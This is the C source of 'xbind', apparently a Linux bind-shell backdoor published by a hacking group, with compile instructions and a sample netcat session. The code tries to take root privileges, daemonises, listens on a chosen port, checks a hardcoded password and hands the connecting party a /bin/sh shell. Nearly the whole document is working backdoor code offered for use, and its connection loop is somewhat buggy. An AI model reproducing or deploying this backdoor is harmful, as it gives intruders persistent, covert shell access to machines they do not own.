linux下的后门:xbind.c
/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:process@cnbct.org
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:\>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define ENTERPASS "Enert your password: \0"
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
#define PASSWORD "cnbct"
int main(int argc, char **argv)
{
struct sockaddr_in s_addr;
struct sockaddr_in c_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
if (argc!=2){
printf("=================================\r\n");
printf("|xbind.c by xy7[B.C.T]\r\n");
printf("|Usage:\r\n");
printf("|./xbind 1985\r\n");
printf("|nc -vv targetIP 1985\r\n");
printf("|enter the password to get shell\r\n");
printf("|Have a nice day;)\r\n");
printf("=================================\r\n");
exit(1);
}
if (fork()){
exit(0);
}
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{
exit(1);
}
}
close(sock_descriptor);
return 0;
}